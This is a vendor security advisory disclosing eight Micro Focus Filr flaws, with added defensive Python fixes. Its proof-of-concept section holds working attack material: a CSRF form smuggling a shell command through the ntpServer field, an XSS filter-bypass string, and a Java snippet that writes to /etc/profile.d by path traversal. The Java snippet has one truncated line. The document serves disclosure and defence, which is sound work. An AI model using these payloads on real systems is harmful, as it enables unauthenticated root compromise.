SEC Consult SA-20160725-0 :: Multiple vulnerabilities in Micro Focus (Novell) Filr Jul 25 2016 09:02AM
SEC Consult Vulnerability Lab (research sec-consult com)
SEC Consult Vulnerability Lab Security Advisory < 20160725-0 >
title: Multiple vulnerabilities
product: Micro Focus (former Novell) Filr Appliance
vulnerable version: Filr 2 <=, Filr 1.2 <=
fixed version: Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871
CVE number: CVE-2016-1607, CVE-2016-1608, CVE-2016-1609
CVE-2016-1610, CVE-2016-1611
impact: critical
homepage: https://www.novell.com/products/filr/
found: 2016-05-23
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich


Vendor description:
"Unlike other mobile file access and collaborative file sharing solutions, Micro
Focus Filr has been designed with the enterprise in mind, resulting in less
administration, better security and more productive users."

URL: https://www.novell.com/products/filr/

Business recommendation:
During a very quick security check several vulnerabilities with high impact
have been discovered. SEC Consult recommends applying the patches provided by
Micro Focus immediately to address these issues.

Please note that since SEC Consult did not conduct a thorough technical security
check SEC Consult cannot make a statement regarding the overall security of the
Micro Focus Filr appliance.

Vulnerability overview/description:
During a quick security check several vulnerabilities have been identified that
ultimately allow an attacker to completely compromise the appliance:

1) Cross Site Request Forgery (CSRF) - CVE-2016-1607
Several functions within the appliance's administrative interface lack protection
against CSRF attacks. This allows an attacker who targets an authenticated
administrator to reconfigure the appliance.

2) OS Command Injection - CVE-2016-1608
The appliance administrative interface allows an authenticated attacker to
execute arbitrary operating system commands. Please note that an attacker can
combine this vulnerability with vulnerability #1. In this scenario, an attacker
does not need to be authenticated.
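The two weaknesses above (#1 and #2) combine because the time-configuration
form neither binds the request to the administrator's session nor validates the
"ntpServer" value before it reaches a shell. The following Python fragment is
an added example written for this advisory and is not Filr's code or Micro
Focus' fix. It shows the request handling a hardened form endpoint would do:
a synchronizer-token CSRF check, strict hostname validation of every NTP
server entry, and an argument vector for the privileged helper that never
passes through a shell. The helper path "/usr/sbin/set-ntp-servers" and the
form field "csrfToken" are assumptions for the example.

```python
import hmac
import re

# RFC 1123 style hostname: labels of letters, digits and hyphens joined by dots.
# Quotes, semicolons, '>' and whitespace (as in the advisory's payload) never match.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# Hypothetical privileged helper that applies the NTP configuration.
NTP_HELPER = "/usr/sbin/set-ntp-servers"


class RequestRejected(Exception):
    """Raised for any request that fails the CSRF or input checks."""


def check_csrf(session_token, submitted_token):
    """Synchronizer-token check: the form must echo the token bound to the session.

    A cross-site form (as in the advisory's PoC) cannot read the victim's token,
    so it cannot supply a matching value."""
    if not session_token or not submitted_token:
        raise RequestRejected("missing CSRF token")
    if not hmac.compare_digest(session_token, submitted_token):
        raise RequestRejected("CSRF token mismatch")


def parse_ntp_servers(raw):
    """Split a whitespace-separated server list and validate each entry."""
    servers = raw.split()
    if not servers or len(servers) > 8:
        raise RequestRejected("need 1..8 NTP servers")
    for server in servers:
        if not _HOSTNAME_RE.match(server):
            raise RequestRejected("invalid NTP server: %r" % server)
    return servers


def build_ntp_command(servers):
    """Argument vector for subprocess.run(..., shell=False); no shell parsing
    happens, so shell metacharacters in a value could not be interpreted even
    if validation were bypassed."""
    return [NTP_HELPER] + servers


def handle_time_config(session_token, form):
    """Hardened handler for the /vaconfig/time form: returns the argv to execute."""
    check_csrf(session_token, form.get("csrfToken"))
    servers = parse_ntp_servers(form.get("ntpServer", ""))
    return build_ntp_command(servers)
```

Run against the advisory's payload ("0.novell.pool.ntp.org\n1.novell.pool.ntp.org';id>/tmp/test;'")
the handler rejects the second entry at the hostname check; a form without the
session-bound token is rejected before any input is looked at.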

3) Insecure System Design
The appliance uses a Jetty application server to provide the appliance
administration interface. This application server is started as the superuser
"root". Please note that combined with vulnerability #1 and #2 an attacker can
run commands as the superuser "root" without the need for any authentication.
For vendor remark on #3 see solution section.

4) Persistent Cross-Site Scripting - CVE-2016-1609
The Filr web interface uses a blacklist filter to try to strip any JavaScript
code from user input. However, this filter can be bypassed to persistently
inject JavaScript code into the Filr web interface.
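Why a blacklist fails on the string shown later in the proof of concept
(`<img src='>' onerror='alert(1)'>`) is easiest to see next to a filter that
scans each tag only up to the first ">": the ">" inside the quoted src value
ends its scan before it reaches the onerror attribute, while a browser's
tokenizer treats the quoted ">" as part of the value and keeps going. The
Python below is an added example, not Filr's filter (whose logic is not
described in the advisory); the "naive" filter is an illustrative stand-in,
and the fix shown is context-aware output encoding of the profile field
rather than input filtering.

```python
import html
import re
from html.parser import HTMLParser

# Illustrative blacklist filter (assumed for the example, NOT Filr's code):
# locate each tag up to the first '>' and strip on*= event-handler attributes.
_TAG_RE = re.compile(r"<(\w+)([^>]*)>")
_EVENT_ATTR_RE = re.compile(
    r"\s+on\w+\s*=\s*(?:'[^']*'|\"[^\"]*\"|[^\s>]+)", re.IGNORECASE
)


def naive_blacklist_filter(value):
    """Remove on* handlers from every tag the simple regex can see."""
    def clean_tag(match):
        return "<%s%s>" % (match.group(1), _EVENT_ATTR_RE.sub("", match.group(2)))
    return _TAG_RE.sub(clean_tag, value)


def render_profile_field(value):
    """Hardened alternative: the field is text, so encode it for an HTML text
    context instead of trying to enumerate dangerous markup."""
    return html.escape(value, quote=True)


class _HandlerFinder(HTMLParser):
    """Stand-in for the browser's tokenizer: does any start tag carry an on* attribute?"""
    def __init__(self):
        super().__init__()
        self.found = False

    def handle_starttag(self, tag, attrs):
        if any(name.lower().startswith("on") for name, _ in attrs):
            self.found = True


def browser_would_execute(fragment):
    parser = _HandlerFinder()
    parser.feed(fragment)
    parser.close()
    return parser.found
```

On the plain `<img src='x' onerror='alert(1)'>` the blacklist does its job; on
the advisory's bypass string it returns the input unchanged and a tokenizer
still sees the onerror handler, whereas the escaped output contains no tag at
all.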

5) Missing Cookie Flags
The httpOnly cookie flag is not set for any session cookies set by both the
administrative appliance web interface and the Filr web interface. Please note
that combined with vulnerability #4 an attacker can steal session cookies of
both the appliance administration interface and the Filr web interface (since
cookies are shared across ports).
For vendor remark on #5 see solution section.
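A quick way to verify the cookie-flag finding on one's own deployment is to
audit the Set-Cookie headers a response carries. The Python below is an added
example (not part of the advisory) that reports, per cookie, which of the
HttpOnly and Secure attributes are absent. The response headers are a
constructed sample; only the name JSESSIONID comes from the advisory, the
other cookie names are illustrative. The cross-port point the advisory makes
cannot be fixed by a flag: cookies are scoped by host, not port, so a cookie
set by the Filr interface is sent to the administration interface on 9443 as
well, which is why the httpOnly gap on one interface exposes the other.

```python
def audit_set_cookie(header_value):
    """Return (cookie name, list of missing attributes) for one Set-Cookie header."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    # Attribute names are case-insensitive; values (Path=/, Expires=...) are ignored.
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:]}
    missing = [flag for flag in ("HttpOnly", "Secure") if flag.lower() not in attrs]
    return name, missing


def audit_response_headers(headers):
    """headers: list of (name, value) pairs as read from an HTTP response.
    Returns {cookie name: [missing attributes]} for cookies that need attention."""
    findings = {}
    for name, value in headers:
        if name.lower() == "set-cookie":
            cookie, missing = audit_set_cookie(value)
            if missing:
                findings[cookie] = missing
    return findings


# Constructed sample response headers (not captured from a real appliance).
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "JSESSIONID=0123456789ABCDEF; Path=/; Secure"),
    ("Set-Cookie", "rememberme=abc; Path=/; Expires=Wed, 01 Jan 2020 00:00:00 GMT"),
    ("Set-Cookie", "hardened=xyz; Path=/; Secure; HttpOnly; SameSite=Strict"),
]


def audit_sample():
    return audit_response_headers(SAMPLE_HEADERS)
```

The same function can be pointed at the headers returned by an HTTP client
such as urllib (`response.getheaders()` yields the (name, value) pairs it
expects); the sample above is there so the example runs offline.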

6) Authentication Bypass - CVE-2016-1610
An unauthenticated attacker is able to upload email templates.

7) Path Traversal - CVE-2016-1610
The functionality that allows an administrator to upload email templates fails
to restrict the directory the templates are uploaded to. Please note that
combined with vulnerability #6 an attacker is able to upload arbitrary files with
the permissions of the system user "wwwrun".
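Both findings (#6 and #7) are fixed on the server side of the template upload:
the request must be authorized before anything else, and the destination must be
confined to the template directory regardless of what the client sends. The
Python below is an added example written for this advisory, not Filr's upload
code; the base directory "/opt/filr/email-templates" is a hypothetical path.
The file name from the proof of concept ("../../../../etc/profile.d/vainit.sh")
is used only as a rejected input.

```python
import os


class UploadRejected(Exception):
    """Raised when the upload is unauthorized or would leave the template directory."""


# Hypothetical location of the email templates.
TEMPLATE_DIR = "/opt/filr/email-templates"


def resolve_template_path(base_dir, requested_name, is_admin):
    """Authorize the caller (#6) and confine the target path to base_dir (#7).

    Returns the absolute path the template may be written to."""
    if not is_admin:
        raise UploadRejected("administrator authentication required")
    # A template is a single file name: separators, NUL and empty names are
    # rejected up front rather than normalized.
    if (not requested_name or "/" in requested_name or "\\" in requested_name
            or "\0" in requested_name):
        raise UploadRejected("invalid template name")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested_name))
    # Defence in depth: after resolving symlinks and '..', the target must still
    # be inside base_dir. commonpath catches '..' as a whole name and prefix
    # tricks such as '/opt/filr/email-templates-evil'.
    if os.path.commonpath([base, target]) != base:
        raise UploadRejected("path escapes template directory")
    return target
```

The separator check alone stops the proof-of-concept name; the realpath and
commonpath comparison remains as a second line of defence for names such as
".." and for symlinks inside the template directory that point elsewhere.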

8) Insecure File Permissions - CVE-2016-1611
A file that is run upon system user login is world-writeable. This allows a
local attacker with restricted privileges to inject commands that are being
executed as privileged users as soon as they log into the system. Please note
that combined with vulnerabilities #6 and #7 an unauthenticated attacker can
inject commands that are executed as privileged system users (e.g. root) using
the Filr web interface.
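A world-writable file under /etc/profile.d is easy to detect and to remediate,
and the check belongs in any image-hardening or configuration-audit run. The
Python below is an added example, not part of the advisory or of the vendor
patch: it lists regular files in a directory whose mode grants write access to
"others" and can clear that bit. Because the example must run offline, it
builds a constructed stand-in for /etc/profile.d in a temporary directory; the
file name vainit.sh comes from the advisory's proof of concept, the other two
names are illustrative.

```python
import os
import stat
import tempfile


def world_writable_files(directory):
    """Names of regular files in directory whose mode includes write for 'others'.

    Symlinks are not followed (lstat) so a link into a world-writable location
    elsewhere is not misreported as a problem with this directory."""
    hits = []
    for entry in sorted(os.listdir(directory)):
        st = os.lstat(os.path.join(directory, entry))
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
            hits.append(entry)
    return hits


def remove_world_write(directory):
    """Clear the o+w bit on every offending file; returns the names fixed."""
    fixed = []
    for entry in world_writable_files(directory):
        path = os.path.join(directory, entry)
        mode = stat.S_IMODE(os.lstat(path).st_mode)
        os.chmod(path, mode & ~stat.S_IWOTH)
        fixed.append(entry)
    return fixed


def build_sample_profile_d():
    """Constructed stand-in for /etc/profile.d with one world-writable script."""
    directory = tempfile.mkdtemp(prefix="profile.d-sample-")
    for name, mode in {"vainit.sh": 0o666, "lang.sh": 0o644, "ok.sh": 0o755}.items():
        path = os.path.join(directory, name)
        with open(path, "w") as fh:
            fh.write("# constructed sample\n")
        os.chmod(path, mode)
    return directory


def demo():
    """Audit the sample, fix it, audit again: (before, fixed, after)."""
    directory = build_sample_profile_d()
    before = world_writable_files(directory)
    fixed = remove_world_write(directory)
    after = world_writable_files(directory)
    return before, fixed, after
```

On a real system the same functions are pointed at /etc/profile.d; ownership
should be checked alongside mode, since a file writable by an unprivileged
owner is equally able to inject commands into every login shell.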

Proof of concept:
1, 2, 3)
The following HTML fragment demonstrates that using a CSRF attack (#1) system
commands can be injected (#2) that are executed as the user root (#3):

----- snip -----
<form action="https://<host>:9443/vaconfig/time" method="POST">
<input type="hidden" name="ntpServer" value="0.novell.pool.ntp.org
1.novell.pool.ntp.org';id>/tmp/test;'" />
<input type="hidden" name="region" value="europe" />
<input type="hidden" name="timeZone" value="Europe/Vienna" />
<input type="hidden" name="utc" value="true" />
<input type="hidden" name="_utc" value="on" />
<input type="submit" value="Submit request" />
</form>
----- snip -----

The following string demonstrates how the XSS filter can be circumvented:
<img src='>' onerror='alert(1)'>

This string can e.g. be used by a restricted user in the "phone" field of the
user profile. The script is executed by anyone viewing the profile (e.g. admins).

None of the session cookies are set with the httpOnly flag.

6, 7, 8)
The following Java fragment demonstrates how an unauthenticated attacker (#6)
can overwrite a file in the filesystem (#7 & #8) that is executed upon user
login of e.g. the root user:

----- snip -----
String sessionCookie = "sectest";
String host = "http://<host>/";

ProxySettings settings = new ProxySettings();
HttpCookie cookie = new HttpCookie("JSESSIONID", sessionCookie);

settings.setCookieManager(new CookieManager());
settings.getCookieManager().getCookieStore().add(new URI(host), cookie);

settings.setModuleBaseUrl(host + "ssf/gwt/");
GwtRpcService svc = SyncProxy.createProxy(GwtRpcService.class, settings);

VibeXsrfToken token = new VibeXsrfToken(
((HasRpcToken) svc).setRpcToken(token);

String fileName = "../../../../etc/profile.d/vainit.sh";
FileBlob fileBlob = new FileBlob(ReadType.TEXT, fileName, "", 1l, 4, 1l, false, 4l);
fileBlob.setBlobDataString("id > /tmp/profiledtest\n");
BinderInfo folderInfo = new BinderInfo();
folderInfo.setBinderId((long) 1);
VibeRpcCmd cmd = new UploadFileBlobCmd(folderInfo, fileBlob, true);
HttpRequestInfo ri = new HttpRequestInfo();
svc.executeCommand(ri, cmd);
----- snip -----

Vulnerable / tested versions:
The version of Micro Focus Filr was found to be vulnerable. This
version was the latest version at the time of the discovery.

According to the vendor, Filr 1.2 is also vulnerable.

Vendor contact timeline:
2016-05-23: Sending encrypted advisory to security (at) novell (dot) com, setting latest
possible release date to 2016-07-12
2016-05-24: Initial response from Micro Focus: forwarded the information to Filr
engineering team
2016-06-13: Micro Focus releases patch to address issue #8
2016-06-14: Requested status update
2016-06-14: Micro Focus expects release of the patches in early July
2016-06-30: Asking for status update, answer of Micro Focus
2016-07-06: Micro Focus needs more time to patch issues, release re-scheduled
for 15th
2016-07-12: Asking for status update; "final rounds of QA" at Micro Focus
2016-07-16: Postponing advisory release, patch not yet ready
2016-07-22: Patch release by Micro Focus
2016-07-25: Coordinated advisory release

The "Filr 2.0 Security Update 2" can be downloaded here and should
be applied immediately:
Those patches fix vulnerabilities #1, #2, #4, #6, #7

"Filr 1.2 Security Update 3" can be found here:

Knowledge base references at Micro Focus:
Issue #1: https://www.novell.com/support/kb/doc.php?id=7017786
Issue #2: https://www.novell.com/support/kb/doc.php?id=7017789
Issue #4: https://www.novell.com/support/kb/doc.php?id=7017787
Issue #6 & #7: https://www.novell.com/support/kb/doc.php?id=7017788

Local privilege escalation via insecure file permissions (#8) has
already been fixed in the Filr 2.0 security update 1 in June:

Issue #3: According to Micro Focus, Jetty actually runs as user
"vabase-jetty" but will pass commands off to another service on
the box that runs as root to perform privileged actions.
They have fixed the command injection in this release and the
next release will include much more stringent parameter validation
for passing the commands.

Issue #5: According to Micro Focus, a component of Filr does not
function properly when the httpOnly flag is enabled. This will be
addressed in a future release.


Advisory URL:


About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Ettlinger / @2016
